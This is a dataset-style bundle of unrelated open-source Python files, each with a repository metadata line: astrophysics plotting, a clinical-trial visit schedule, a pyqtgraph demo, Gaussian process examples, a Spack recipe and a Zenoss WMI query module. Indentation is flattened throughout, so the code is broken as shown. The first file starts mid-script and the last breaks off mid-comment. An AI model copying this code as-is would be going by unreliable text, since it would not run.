vmaxBar[ii], vmaxStd[ii], distrib[ii] = n.mean(y), n.std(y), sc(y,pcs)
N[ii],bbs[ii] = n.histogram(y, bins= Nbins )
ok = (vmaxBar>0)&(vmaxStd>0)&(bins[1:]>0.4)&(bins[:-1]<100)&(N.sum(axis=1)>100)
x = n.log10(1.+(bins[1:]*bins[:-1])**0.5)[ok]
y = n.log10(vmaxBar)[ok]
yerr = vmaxStd[ok] / vmaxBar[ok]
f= lambda x,a,b : a*x+b
out, cov = curve_fit(f, x, y, (1,0), yerr )
p.figure(0)
p.plot(n.log10(1+hd['DF']), n.log10(hd['Vmax']),'r.',alpha=0.1, label='QSO z=0.7',rasterized = True)
p.errorbar(x,y,yerr=yerr/2.,label='mean - std')
p.plot(x, f(x,out[0],out[1]),'k--',lw=2,label='fit y='+str(n.round(out[0],3))+'x+'+str(n.round(out[1],3)))
p.xlabel(r'$log_{10}(1+\delta)$')
p.ylabel(r'$log_{10}(V_{max})$')
p.legend(loc= 2)
p.grid()
p.savefig(join(mockDir,"plots","delta-vmax-qso-z07-fit.png"))
p.clf()
#log10(vmax) = 0.0973259*log10(1+delta) + 2.254723554
params = n.empty((len(bins[ok])-1,3))
paramsErr = n.empty((len(bins[ok])-1,3))
histBins = n.arange(-0.7, 0.71, 0.05)
p.figure(0, (12,8))
for jj in range(len(bins[ok])-1):
sel = (hd['DF']>bins[ok][jj]) & (hd['DF']<bins[ok][jj+1])
yDat= hd['Vmax'][sel]
#print jj, yDat
x1 = n.log10(yDat) - n.log10(n.mean(yDat))
counts, bs = n.histogram(x1, bins=histBins)
#print counts, bs
xx=(bs[1:]+bs[:-1])/2.
p.errorbar(xx,counts,yerr = counts**0.5 , label=r'$\delta\in$'+str(n.round(bins[ok][jj],2))+', '+str(n.round(bins[ok][jj+1],2)))
p.ylabel(r'counts')
p.xlabel(r'$log_{10}(V_{max})/\bar{V}$')
p.grid()
p.xlim((-1, 1.3))
p.legend(fontsize=8)
p.savefig(join(mockDir,"plots","delta-vmaxHistPerDelta-qso-z07.png"))
p.clf()
xs = n.empty((len(bins[ok])-1, len(histBins)))
ys = n.empty((len(bins[ok])-1, len(histBins)-1))
p.figure(0, (12,8))
for jj in range(len(bins[ok])-1):
sel = (hd['DF']>bins[ok][jj]) & (hd['DF']<bins[ok][jj+1])
yDat= hd['Vmax'][sel]
#print jj, yDat
x1 = n.log10(yDat) - n.log10(n.mean(yDat))
counts, bs = n.histogram(x1, normed = True, bins = histBins)
#print counts, bs
xx=(bs[1:]+bs[:-1])/2.
p.plot(xx,counts, ls='--',lw=0.5, label=r'$\delta\in$'+str(n.round(bins[ok][jj],2))+', '+str(n.round(bins[ok][jj+1],2)))
ys[jj] = counts
xs[jj] = bs
Xbin=bs # n.mean(xs,axis=0)
X=(Xbin[1:]+Xbin[:-1])/2.
Y=n.mean(ys,axis=0)
YERR=n.std(ys,axis=0)
p.errorbar(X,Y, yerr = YERR, lw=2)
p.ylabel(r'counts')
p.xlabel(r'$log_{10}(V_{max})/\bar{V}$')
p.grid()
p.xlim((-1, 1.3))
p.legend(fontsize=8)
p.savefig(join(mockDir,"plots","delta-vmaxHistPerDeltaNormed-qso-z07.png"))
p.clf()
g = lambda var, sig, A, mu : A *n.e**(- (var- mu)**2./ (2*sig**2.))
positive= (Y>0)&(YERR>0)
out2, cov2 = curve_fit(g, X[positive], Y[positive], (0.12, n.max(Y), -0.025), YERR[positive])# , maxfev = 5000)
#g = lambda var, sig, A : A *n.e**(- (var+0.025)**2./ (2*sig**2.))
#out2, cov2 = curve_fit(g, X[:-2], Y[:-2], (0.13, n.max(Y)), YERR[:-2])# , maxfev = 5000)
#print out2
p.figure(0)
p.errorbar(X,Y, yerr = YERR, label='DATA')
xpl = n.arange(X.min(),X.max(),0.001)
#p.plot(xpl, g(xpl, out2[0],out2[1]), label='gaussian fit')
p.plot(xpl, g(xpl, out2[0],out2[1],out2[2]), label='gaussian fit')
p.ylabel(r'counts')
p.xlabel(r'$log_{10}(V_{max})/\bar{V}$')
p.grid()
p.xlim((-1, 1.3))
p.legend()
p.title(r'$\sigma=$'+str(n.round(out2[0],3))+r', $\mu=$'+str(n.round(out2[2],3))+r', $A=$'+str(n.round(out2[1],3)))
p.savefig(join(mockDir,"plots","delta-vmaxHistPerDeltaNormed-FIT-qso-z07.png"))
p.clf()
"""
g = lambda var, sig, A, mu : A *n.e**(- (var- mu)**2./ (2*sig**2.))
out2, cov2 = curve_fit(g, xx, counts, (0.1, n.max(counts), 0.), 2*counts**0.5 , maxfev = 500000000)
chi2 = n.sum((g(xx,out2[0], out2[1],out2[2]) - counts)**2. * counts**(-0.5) / (len(counts) - len(out2)))
params[jj]=out2
paramsErr[jj] = [cov2[0][0], cov2[1][1], cov2[2][2]]
p.errorbar(xx,counts,yerr = counts**0.5 , label=r'$\delta\in$'+str(n.round(bins[ok][jj],2))+', '+str(n.round(bins[ok][jj+1],2)))
xpl = n.arange(xx.min(),xx.max(),0.001)
p.plot(xpl, g(xpl, out2[0],out2[1],out2[2]), label='gaussian')
p.ylabel(r'counts')
p.xlabel(r'$log_{10}(V_{max})/\bar{V}$')
p.grid()
p.title(r'$\sigma=$'+str(n.round(out2[0],3))+r', $\mu=$'+str(n.round(out2[2],3))+r', $A=$'+str(n.round(out2[2],3)))
p.legend()
p.show()
hd = fits.open(join( mockDir,"Box_HAM_z0.701838_nbar1.000000e-04_LRG.DF.fits.gz"))
hd = fits.open(join( mockDir,"Box_HAM_z0.701838_nbar2.400000e-04_ELG.DF.fits.gz"))
"""
| JohanComparat/nbody-npt-functions | bin/bin_DF/test_scripts/fit_density_field_to-tracers.py | Python | cc0-1.0 | 38,029 | ["Galaxy", "Gaussian"] | 3917de26e7fcbd31180080fa1ff74c441cea03f5a739dc3999a8bc86be120501 |
from collections import OrderedDict
from edc_visit_schedule.classes import (
VisitScheduleConfiguration, MembershipFormTuple, ScheduleTuple)
from ..models import TestVisit, TestVisit2, TestConsentWithMixin, TestAliquotType, TestPanel
from edc_testing.classes.entries import requisition_entries, crf_entries
class TestVisitSchedule(VisitScheduleConfiguration):
"""A visit schedule class for tests."""
name = 'Test Visit Schedule'
app_label = 'edc_testing'
panel_model = TestPanel
aliquot_type_model = TestAliquotType
membership_forms = OrderedDict({
'schedule-1': MembershipFormTuple('schedule-1', TestConsentWithMixin, True),
})
schedules = OrderedDict({
'schedule-1': ScheduleTuple('schedule-1', 'schedule-1', None, None),
})
visit_definitions = OrderedDict(
{'1000': {
'title': '1000',
'time_point': 0,
'base_interval': 0,
'base_interval_unit': 'D',
'window_lower_bound': 0,
'window_lower_bound_unit': 'D',
'window_upper_bound': 0,
'window_upper_bound_unit': 'D',
'grouping': 'group1',
'visit_tracking_model': TestVisit,
'schedule': 'schedule-1',
'instructions': None,
'requisitions': requisition_entries,
'entries': crf_entries},
'2000': {
'title': '2000',
'time_point': 1,
'base_interval': 0,
'base_interval_unit': 'D',
'window_lower_bound': 0,
'window_lower_bound_unit': 'D',
'window_upper_bound': 0,
'window_upper_bound_unit': 'D',
'grouping': 'group1',
'visit_tracking_model': TestVisit,
'schedule': 'schedule-1',
'instructions': None,
'requisitions': requisition_entries,
'entries': crf_entries},
'2000A': {
'title': '2000A',
'time_point': 0,
'base_interval': 0,
'base_interval_unit': 'D',
'window_lower_bound': 0,
'window_lower_bound_unit': 'D',
'window_upper_bound': 0,
'window_upper_bound_unit': 'D',
'grouping': 'group2',
'visit_tracking_model': TestVisit2,
'schedule': 'schedule-1',
'instructions': None,
'requisitions': requisition_entries,
'entries': crf_entries},
'2010A': {
'title': '2010A',
'time_point': 1,
'base_interval': 0,
'base_interval_unit': 'D',
'window_lower_bound': 0,
'window_lower_bound_unit': 'D',
'window_upper_bound': 0,
'window_upper_bound_unit': 'D',
'grouping': 'group2',
'visit_tracking_model': TestVisit2,
'schedule': 'schedule-1',
'instructions': None,
'requisitions': requisition_entries,
'entries': crf_entries},
'2020A': {
'title': '2020A',
'time_point': 2,
'base_interval': 0,
'base_interval_unit': 'D',
'window_lower_bound': 0,
'window_lower_bound_unit': 'D',
'window_upper_bound': 0,
'window_upper_bound_unit': 'D',
'grouping': 'group2',
'visit_tracking_model': TestVisit2,
'schedule': 'schedule-1',
'instructions': None,
'requisitions': requisition_entries,
'entries': crf_entries},
'2030A': {
'title': '2030A',
'time_point': 3,
'base_interval': 0,
'base_interval_unit': 'D',
'window_lower_bound': 0,
'window_lower_bound_unit': 'D',
'window_upper_bound': 0,
'window_upper_bound_unit': 'D',
'grouping': 'group2',
'visit_tracking_model': TestVisit2,
'schedule': 'schedule-1',
'instructions': None,
'requisitions': requisition_entries,
'entries': crf_entries},
},
)
| botswana-harvard/edc-testing | edc_testing/classes/test_visit_schedule.py | Python | gpl-2.0 | 4,221 | ["VisIt"] | 547a56ece9921e0f68eb4035353951e1279d97ec6ee6d944ab5ff01b49b0a0cc |
# -*- coding: utf-8 -*-
"""
This example demonstrates a very basic use of flowcharts: filter data,
displaying both the input and output of the filter. The behavior of
the filter can be reprogrammed by the user.
Basic steps are:
- create a flowchart and two plots
- input noisy data to the flowchart
- flowchart connects data to the first plot, where it is displayed
- add a gaussian filter to lowpass the data, then display it in the second plot.
"""
import initExample ## Add path to library (just for examples; you do not need this)
from pyqtgraph.flowchart import Flowchart
from pyqtgraph.Qt import QtGui, QtCore
import pyqtgraph as pg
import numpy as np
import pyqtgraph.metaarray as metaarray
app = QtGui.QApplication([])
## Create main window with grid layout
win = QtGui.QMainWindow()
win.setWindowTitle('pyqtgraph example: Flowchart')
cw = QtGui.QWidget()
win.setCentralWidget(cw)
layout = QtGui.QGridLayout()
cw.setLayout(layout)
## Create flowchart, define input/output terminals
fc = Flowchart(terminals={
'dataIn': {'io': 'in'},
'dataOut': {'io': 'out'}
})
w = fc.widget()
## Add flowchart control panel to the main window
layout.addWidget(fc.widget(), 0, 0, 2, 1)
## Add two plot widgets
pw1 = pg.PlotWidget()
pw2 = pg.PlotWidget()
layout.addWidget(pw1, 0, 1)
layout.addWidget(pw2, 1, 1)
win.show()
## generate signal data to pass through the flowchart
data = np.random.normal(size=1000)
data[200:300] += 1
data += np.sin(np.linspace(0, 100, 1000))
data = metaarray.MetaArray(data, info=[{'name': 'Time', 'values': np.linspace(0, 1.0, len(data))}, {}])
## Feed data into the input terminal of the flowchart
fc.setInput(dataIn=data)
## populate the flowchart with a basic set of processing nodes.
## (usually we let the user do this)
plotList = {'Top Plot': pw1, 'Bottom Plot': pw2}
pw1Node = fc.createNode('PlotWidget', pos=(0, -150))
pw1Node.setPlotList(plotList)
pw1Node.setPlot(pw1)
pw2Node = fc.createNode('PlotWidget', pos=(150, -150))
pw2Node.setPlot(pw2)
pw2Node.setPlotList(plotList)
fNode = fc.createNode('GaussianFilter', pos=(0, 0))
fNode.ctrls['sigma'].setValue(5)
fc.connectTerminals(fc['dataIn'], fNode['In'])
fc.connectTerminals(fc['dataIn'], pw1Node['In'])
fc.connectTerminals(fNode['Out'], pw2Node['In'])
fc.connectTerminals(fNode['Out'], fc['dataOut'])
## Start Qt event loop unless running in interactive mode or using pyside.
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
| UpSea/thirdParty | pyqtgraph-0.9.10/examples/Flowchart.py | Python | mit | 2,561 | ["Gaussian"] | d6bd786a4f42dd80d0e879d5a712750e2b47aaac02bf7c513887e960d5833a63 |
print "importing stuff..."
import numpy as np
import pdb
import matplotlib
matplotlib.use('Agg')
import matplotlib.pylab as plt
from scipy import special
from .datautils import step, spiral
from .context import aep
def run_regression_1D():
np.random.seed(42)
print "create dataset ..."
N = 200
X = np.random.rand(N, 1)
Y = np.sin(12 * X) + 0.5 * np.cos(25 * X) + np.random.randn(N, 1) * 0.2
# plt.plot(X, Y, 'kx', mew=2)
def plot(m):
xx = np.linspace(-0.5, 1.5, 100)[:, None]
mean, var = m.predict_f(xx)
zu = m.sgp_layer.zu
mean_u, var_u = m.predict_f(zu)
plt.figure()
plt.plot(X, Y, 'kx', mew=2)
plt.plot(xx, mean, 'b', lw=2)
plt.fill_between(
xx[:, 0],
mean[:, 0] - 2 * np.sqrt(var[:, 0]),
mean[:, 0] + 2 * np.sqrt(var[:, 0]),
color='blue', alpha=0.2)
plt.errorbar(zu, mean_u, yerr=2 * np.sqrt(var_u), fmt='ro')
plt.xlim(-0.1, 1.1)
# inference
print "create model and optimize ..."
M = 20
model = aep.SGPR(X, Y, M, lik='Gaussian')
model.optimise(method='L-BFGS-B', alpha=0.1, maxiter=50000)
plot(model)
plt.show()
def run_banana():
def gridParams():
mins = [-3.25, -2.85]
maxs = [3.65, 3.4]
nGrid = 50
xspaced = np.linspace(mins[0], maxs[0], nGrid)
yspaced = np.linspace(mins[1], maxs[1], nGrid)
xx, yy = np.meshgrid(xspaced, yspaced)
Xplot = np.vstack((xx.flatten(), yy.flatten())).T
return mins, maxs, xx, yy, Xplot
def plot(m):
col1 = '#0172B2'
col2 = '#CC6600'
mins, maxs, xx, yy, Xplot = gridParams()
mf, vf = m.predict_f(Xplot)
plt.figure()
plt.plot(
Xtrain[:, 0][Ytrain[:, 0] == 1],
Xtrain[:, 1][Ytrain[:, 0] == 1],
'o', color=col1, mew=0, alpha=0.5)
plt.plot(
Xtrain[:, 0][Ytrain[:, 0] == -1],
Xtrain[:, 1][Ytrain[:, 0] == -1],
'o', color=col2, mew=0, alpha=0.5)
zu = m.sgp_layer.zu
plt.plot(zu[:, 0], zu[:, 1], 'ro', mew=0, ms=4)
plt.contour(
xx, yy, mf.reshape(*xx.shape), [0],
colors='k', linewidths=1.8, zorder=100)
Xtrain = np.loadtxt(
'./examples/data/banana_X_train.txt', delimiter=',')
Ytrain = np.loadtxt(
'./examples/data/banana_Y_train.txt', delimiter=',').reshape(-1, 1)
Ytrain[np.where(Ytrain == 0)[0]] = -1
M = 50
model = aep.SGPR(Xtrain, Ytrain, M, lik='Probit')
model.optimise(method='L-BFGS-B', alpha=0.01, maxiter=2000)
plot(model)
model = aep.SGPR(Xtrain, Ytrain, M, lik='Probit')
model.optimise(method='L-BFGS-B', alpha=0.2, maxiter=2000)
plot(model)
model = aep.SGPR(Xtrain, Ytrain, M, lik='Probit')
model.optimise(method='L-BFGS-B', alpha=0.7, maxiter=2000)
plot(model)
plt.show()
def run_regression_1D_stoc():
np.random.seed(42)
print "create dataset ..."
N = 200
X = np.random.rand(N, 1)
Y = np.sin(12 * X) + 0.5 * np.cos(25 * X) + np.random.randn(N, 1) * 0.2
# plt.plot(X, Y, 'kx', mew=2)
def plot(m):
xx = np.linspace(-0.5, 1.5, 100)[:, None]
mean, var = m.predict_f(xx)
zu = m.sgp_layer.zu
mean_u, var_u = m.predict_f(zu)
plt.figure()
plt.plot(X, Y, 'kx', mew=2)
plt.plot(xx, mean, 'b', lw=2)
plt.fill_between(
xx[:, 0],
mean[:, 0] - 2 * np.sqrt(var[:, 0]),
mean[:, 0] + 2 * np.sqrt(var[:, 0]),
color='blue', alpha=0.2)
plt.errorbar(zu, mean_u, yerr=2 * np.sqrt(var_u), fmt='ro')
plt.xlim(-0.1, 1.1)
# inference
print "create model and optimize ..."
M = 20
model = aep.SGPR(X, Y, M, lik='Gaussian')
model.optimise(method='adam', alpha=0.1,
maxiter=100000, mb_size=M, adam_lr=0.001)
plot(model)
plt.show()
plt.savefig('/tmp/aep_gpr_1D_stoc.pdf')
def run_banana_stoc():
def gridParams():
mins = [-3.25, -2.85]
maxs = [3.65, 3.4]
nGrid = 50
xspaced = np.linspace(mins[0], maxs[0], nGrid)
yspaced = np.linspace(mins[1], maxs[1], nGrid)
xx, yy = np.meshgrid(xspaced, yspaced)
Xplot = np.vstack((xx.flatten(), yy.flatten())).T
return mins, maxs, xx, yy, Xplot
def plot(m):
col1 = '#0172B2'
col2 = '#CC6600'
mins, maxs, xx, yy, Xplot = gridParams()
mf, vf = m.predict_f(Xplot)
plt.figure()
plt.plot(
Xtrain[:, 0][Ytrain[:, 0] == 1],
Xtrain[:, 1][Ytrain[:, 0] == 1],
'o', color=col1, mew=0, alpha=0.5)
plt.plot(
Xtrain[:, 0][Ytrain[:, 0] == -1],
Xtrain[:, 1][Ytrain[:, 0] == -1],
'o', color=col2, mew=0, alpha=0.5)
zu = m.sgp_layer.zu
plt.plot(zu[:, 0], zu[:, 1], 'ro', mew=0, ms=4)
plt.contour(
xx, yy, mf.reshape(*xx.shape), [0],
colors='k', linewidths=1.8, zorder=100)
Xtrain = np.loadtxt(
'./examples/data/banana_X_train.txt', delimiter=',')
Ytrain = np.loadtxt(
'./examples/data/banana_Y_train.txt', delimiter=',').reshape(-1, 1)
Ytrain[np.where(Ytrain == 0)[0]] = -1
M = 30
model = aep.SGPR(Xtrain, Ytrain, M, lik='Probit')
model.optimise(method='adam', alpha=0.5,
maxiter=100000, mb_size=M, adam_lr=0.001)
plot(model)
plt.show()
plt.savefig('/tmp/aep_gpc_banana_stoc.pdf')
def run_step_1D():
np.random.seed(42)
print "create dataset ..."
N = 200
X = np.random.rand(N, 1) * 3 - 1.5
Y = step(X)
# plt.plot(X, Y, 'kx', mew=2)
def plot(m):
xx = np.linspace(-3, 3, 100)[:, None]
mean, var = m.predict_y(xx)
zu = m.sgp_layer.zu
mean_u, var_u = m.predict_f(zu)
plt.figure()
plt.plot(X, Y, 'kx', mew=2)
plt.plot(xx, mean, 'b', lw=2)
plt.fill_between(
xx[:, 0],
mean[:, 0] - 2 * np.sqrt(var[:, 0]),
mean[:, 0] + 2 * np.sqrt(var[:, 0]),
color='blue', alpha=0.2)
plt.errorbar(zu, mean_u, yerr=2 * np.sqrt(var_u), fmt='ro')
no_samples = 20
xx = np.linspace(-3, 3, 500)[:, None]
f_samples = m.sample_f(xx, no_samples)
for i in range(no_samples):
plt.plot(xx, f_samples[:, :, i], linewidth=0.5, alpha=0.5)
plt.xlim(-3, 3)
# inference
print "create model and optimize ..."
M = 20
model = aep.SGPR(X, Y, M, lik='Gaussian')
model.optimise(method='L-BFGS-B', alpha=0.9, maxiter=2000)
plot(model)
plt.savefig('/tmp/aep_gpr_step.pdf')
# plt.show()
def run_spiral():
np.random.seed(42)
def gridParams():
mins = [-1.2, -1.2]
maxs = [1.2, 1.2]
nGrid = 80
xspaced = np.linspace(mins[0], maxs[0], nGrid)
yspaced = np.linspace(mins[1], maxs[1], nGrid)
xx, yy = np.meshgrid(xspaced, yspaced)
Xplot = np.vstack((xx.flatten(), yy.flatten())).T
return mins, maxs, xx, yy, Xplot
def plot(m):
col1 = '#0172B2'
col2 = '#CC6600'
mins, maxs, xx, yy, Xplot = gridParams()
mf, vf = m.predict_f(Xplot)
plt.figure()
plt.plot(
Xtrain[:, 0][Ytrain[:, 0] == 1],
Xtrain[:, 1][Ytrain[:, 0] == 1],
'o', color=col1, mew=0, alpha=0.5)
plt.plot(
Xtrain[:, 0][Ytrain[:, 0] == -1],
Xtrain[:, 1][Ytrain[:, 0] == -1],
'o', color=col2, mew=0, alpha=0.5)
zu = m.sgp_layer.zu
plt.plot(zu[:, 0], zu[:, 1], 'ro', mew=0, ms=4)
plt.contour(xx, yy, mf.reshape(*xx.shape), [0],
colors='k', linewidths=1.8, zorder=100)
N = 100
M = 50
Xtrain, Ytrain = spiral(N)
Xtrain /= 6
model = aep.SGPR(Xtrain, Ytrain, M, lik='Probit')
model.set_fixed_params(['sf'])
model.optimise(method='L-BFGS-B', alpha=1, maxiter=2000)
plot(model)
plt.show()
def run_boston():
np.random.seed(100)
# We load the dataset
# datapath = '/scratch/tdb40/datasets/reg/bostonHousing/data/'
datapath = '/tmp/bostonHousing/data/'
datafile = datapath + 'data.txt'
data = np.loadtxt(datafile)
# We obtain the features and the targets
xindexfile = datapath + 'index_features.txt'
yindexfile = datapath + 'index_target.txt'
xindices = np.loadtxt(xindexfile, dtype=np.int)
yindex = np.loadtxt(yindexfile, dtype=np.int)
X = data[:, xindices]
y = data[:, yindex]
y = y.reshape([y.shape[0], 1])
train_ind_file = datapath + 'index_train_0.txt'
test_ind_file = datapath + 'index_test_0.txt'
index_train = np.loadtxt(train_ind_file, dtype=np.int)
index_test = np.loadtxt(test_ind_file, dtype=np.int)
X_train = X[index_train, :]
y_train = y[index_train, :]
X_test = X[index_test, :]
y_test = y[index_test, :]
mean_y_train = np.mean(y_train)
std_y_train = np.std(y_train)
y_train_normalized = (y_train - mean_y_train) / std_y_train
M = 50
alpha = 0.5
model = aep.SGPR(X_train, y_train_normalized, M, lik='Gaussian')
model.optimise(method='L-BFGS-B', alpha=alpha, maxiter=2000)
my, vy = model.predict_y(X_test)
my = std_y_train * my + mean_y_train
vy = std_y_train**2 * vy
# We compute the test RMSE
test_rmse = np.sqrt(np.mean((y_test - my)**2))
print 'RMSE %.3f' % test_rmse
# We compute the test log-likelihood
test_nll = np.mean(-0.5 * np.log(2 * np.pi * vy) -
0.5 * (y_test - my)**2 / vy)
print 'MLL %.3f' % test_nll
if __name__ == '__main__':
# run_regression_1D()
# run_banana()
run_step_1D()
# run_spiral()
# run_boston()
# run_regression_1D_stoc()
# run_banana_stoc()
| thangbui/geepee | examples/gpr_aep_examples.py | Python | mit | 9,893 | ["Gaussian"] | 463028c21e88d0723a6b5634cd1a828018f5c61c3ee9ed4cf6c643f1ea171cf6 |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Shortbred(Package):
"""ShortBRED is a system for profiling protein families of interest at
very high specificity in shotgun meta'omic sequencing data."""
homepage = "https://huttenhower.sph.harvard.edu/shortbred"
url = "https://bitbucket.org/biobakery/shortbred/get/0.9.4.tar.gz"
version('0.9.4', sha256='a85e5609db79696d3f2d478408fc6abfeea7628de9f533c4e1e0ea3622b397ba')
depends_on('blast-plus@2.2.28:')
depends_on('cdhit@4.6:')
depends_on('muscle@3.8.31:')
depends_on('python@2.7.9:')
depends_on('py-biopython')
depends_on('usearch@6.0.307:')
def install(self, spec, prefix):
mkdirp(prefix.bin)
install('shortbred_identify.py', prefix.bin)
install('shortbred_quantify.py', prefix.bin)
install_tree('src', prefix.src)
def setup_run_environment(self, env):
env.prepend_path('PYTHONPATH', self.prefix)
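# Usage note (added comment, not part of the recipe): once this recipe is in a
# Spack repository, the package would typically be built with
#   spack install shortbred
# and its scripts made available in the current shell with
#   spack load shortbred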
| iulian787/spack | var/spack/repos/builtin/packages/shortbred/package.py | Python | lgpl-2.1 | 1,129 | ["BLAST", "Biopython"] | c20b8df5ab29576ade4947a75075014b7ca074b8be5369cdc66d6e237a10d26b |
###########################################################################
#
# This program is part of Zenoss Core, an open source monitoring platform.
# Copyright (C) 2008-2010, Zenoss Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2, or (at your
# option) any later version, as published by the Free Software Foundation.
#
# For complete information please visit: http://www.zenoss.com/oss/
#
###########################################################################
from pysamba.library import *
from pysamba.wbem.wbem import *
from twisted.internet import defer
from pysamba.talloc import *
from pysamba.rpc.credentials import *
from pysamba.twisted.callback import Callback, WMIFailure
import Globals
from Products.ZenUtils.Driver import drive
import logging
logging.basicConfig()
log = logging.getLogger('zen.pysamba')
WBEM_S_TIMEDOUT = 0x40004L
WERR_BADFUNC = 1
# struct dcom_client_context *dcom_client_init(struct com_context *ctx,
# struct cli_credentials *credentials)
library.dcom_client_init.restype = c_void_p
library.dcom_client_init.argtypes = [POINTER(com_context), c_void_p]
library.com_init_ctx.restype = WERROR
class _WbemObject:
def __getattr__(self, name):
try:
return self.__dict__[name.lower()]
except Exception, ex:
raise AttributeError(name)
def convertArray(arr):
if not arr:
return None
result = []
arr = arr.contents
for i in range(arr.count):
result.append(arr.item[i])
return result
def convert(v, typeval):
if typeval == CIM_SINT8: return v.v_sint8
if typeval == CIM_UINT8: return v.v_uint8
if typeval == CIM_SINT16: return v.v_sint16
if typeval == CIM_UINT16: return v.v_uint16
if typeval == CIM_SINT32: return v.v_sint32
if typeval == CIM_UINT32: return v.v_uint32
if typeval == CIM_SINT64: return v.v_sint64
if typeval == CIM_UINT64: return v.v_sint64
if typeval == CIM_REAL32: return float(v.v_uint32)
if typeval == CIM_REAL64: return float(v.v_uint64)
if typeval == CIM_BOOLEAN: return bool(v.v_boolean)
if typeval in (CIM_STRING, CIM_DATETIME, CIM_REFERENCE):
return v.v_string
if typeval == CIM_CHAR16:
return v.v_string.decode('utf16')
if typeval == CIM_OBJECT:
return wbemInstanceToPython(v.v_object)
if typeval == CIM_ARR_SINT8: return convertArray(v.a_sint8)
if typeval == CIM_ARR_UINT8: return convertArray(v.a_uint8)
if typeval == CIM_ARR_SINT16: return convertArray(v.a_sint16)
if typeval == CIM_ARR_UINT16: return convertArray(v.a_uint16)
if typeval == CIM_ARR_SINT32: return convertArray(v.a_sint32)
if typeval == CIM_ARR_UINT32: return convertArray(v.a_uint32)
if typeval == CIM_ARR_SINT64: return convertArray(v.a_sint64)
if typeval == CIM_ARR_UINT64: return convertArray(v.a_uint64)
if typeval == CIM_ARR_REAL32: return convertArray(v.a_real32)
if typeval == CIM_ARR_REAL64: return convertArray(v.a_real64)
if typeval == CIM_ARR_BOOLEAN: return convertArray(v.a_boolean)
if typeval == CIM_ARR_STRING: return convertArray(v.a_string)
if typeval == CIM_ARR_DATETIME:
return convertArray(v.contents.a_datetime)
if typeval == CIM_ARR_REFERENCE:
return convertArray(v.contents.a_reference)
return "Unsupported"
def wbemInstanceToPython(obj):
klass = obj.contents.obj_class.contents
inst = obj.contents.instance.contents
result = _WbemObject()
result._class_name = klass.__CLASS
for j in range(klass.__PROPERTY_COUNT):
prop = klass.properties[j]
value = convert(inst.data[j], prop.desc.contents.cimtype & CIM_TYPEMASK)
if prop.name:
setattr(result, prop.name.lower(), value)
return result
def deferred(ctx):
cback = Callback()
ctx.contents.async.fn = cback.callback
return cback.deferred
wbemTimeoutInfinite = -1
class QueryResult(object):
def __init__(self, deviceId, ctx, pEnum):
self._deviceId = deviceId
self.ctx = ctx
talloc_increase_ref_count(self.ctx)
self.pEnum = pEnum
def close(self):
if self.ctx:
talloc_free(self.ctx)
self.ctx = None
def __del__(self):
self.close()
def fetchSome(self, timeoutMs=wbemTimeoutInfinite, chunkSize=10):
assert self.pEnum
def inner(driver):
count = uint32_t()
objs = (POINTER(WbemClassObject)*chunkSize)()
ctx = library.IEnumWbemClassObject_SmartNext_send(
self.pEnum, None, timeoutMs, chunkSize
)
yield deferred(ctx); driver.next()
result = library.IEnumWbemClassObject_SmartNext_recv(
ctx, self.ctx, objs, byref(count)
)
WERR_CHECK(result, self._deviceId, "Retrieve result data.")
result = []
for i in range(count.value):
result.append(wbemInstanceToPython(objs[i]))
talloc_free(objs[i])
driver.finish(result)
return drive(inner)
class Query(object):
def __init__(self):
self.ctx = POINTER(com_context)()
self.pWS = POINTER(IWbemServices)()
self._deviceId = None
def connect(self, eventContext, deviceId, hostname, creds, namespace="root\\cimv2"):
self._deviceId = deviceId
library.com_init_ctx.restype = WERROR
library.com_init_ctx(byref(self.ctx), eventContext)
cred = library.cli_credentials_init(self.ctx)
library.cli_credentials_set_conf(cred)
library.cli_credentials_parse_string(cred, creds, CRED_SPECIFIED)
library.dcom_client_init(self.ctx, cred)
def inner(driver):
flags = uint32_t()
flags.value = 0
ctx = library.WBEM_ConnectServer_send(
self.ctx, # com_ctx
None, # parent_ctx
hostname, # server
namespace, # namespace
None, # username
None, # password
None, # locale
flags.value, # flags
None, # authority
None) # wbem_ctx
yield deferred(ctx); driver.next()
result = library.WBEM_ConnectServer_recv(ctx, None, byref(self.pWS))
WERR_CHECK(result, self._deviceId, "Connect")
driver.finish(None)
return drive(inner)
def query(self, query):
assert self.pWS
def inner(driver):
qctx = None
try:
qctx = library.IWbemServices_ExecQuery_send_f(
self.pWS,
self.ctx,
"WQL",
query,
WBEM_FLAG_RETURN_IMMEDIATELY | WBEM_FLAG_ENSURE_LOCATABLE,
None)
yield deferred(qctx); driver.next()
pEnum = POINTER(IEnumWbemClassObject)()
result = library.IWbemServices_ExecQuery_recv(qctx,
byref(pEnum))
WERR_CHECK(result, self._deviceId, "ExecQuery")
ctx = library.IEnumWbemClassObject_Reset_send_f(pEnum, self.ctx)
yield deferred(ctx); driver.next()
                result = library.IEnumWbemClassObject_Reset_recv(ctx)
                WERR_CHECK(result, self._deviceId, "Reset result of WMI query.")
driver.finish(QueryResult(self._deviceId, self.ctx, pEnum))
except Exception, ex:
log.exception(ex)
raise
return drive(inner)
def notificationQuery(self, query):
assert self.pWS
def inner(driver):
qctx = None
pEnum = None
try:
qctx = library.IWbemServices_ExecNotificationQuery_send_f(
self.pWS,
self.ctx,
"WQL",
query,
WBEM_FLAG_RETURN_IMMEDIATELY | WBEM_FLAG_FORWARD_ONLY,
None)
yield deferred(qctx); driver.next()
pEnum = POINTER(IEnumWbemClassObject)()
result = library.IWbemServices_ExecNotificationQuery_recv(
qctx, byref(pEnum))
WERR_CHECK(result, self._deviceId, "ExecNotificationQuery")
driver.finish(QueryResult(self._deviceId, self.ctx, pEnum))
except Exception, ex:
if pEnum:
c = library.IUnknown_Release_send_f(pEnum, self.ctx)
yield deferred(c); driver.next()
result = library.IUnknown_Release_recv(self.ctx)
WERR_CHECK(result, self._deviceId, "Release")
log.exception(ex)
raise
return drive(inner)
def __del__(self):
self.close()
def close(self):
if self.ctx:
talloc_free(self.ctx)
self.ctx = None
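# --------------------------------------------------------------------------
# Illustrative usage sketch (added for clarity; not part of the original
# Zenoss module).  It shows how Query and QueryResult are meant to be driven
# with the same Driver pattern used above.  The 'eventContext' argument, the
# device/host names and the credential string are placeholders supplied by
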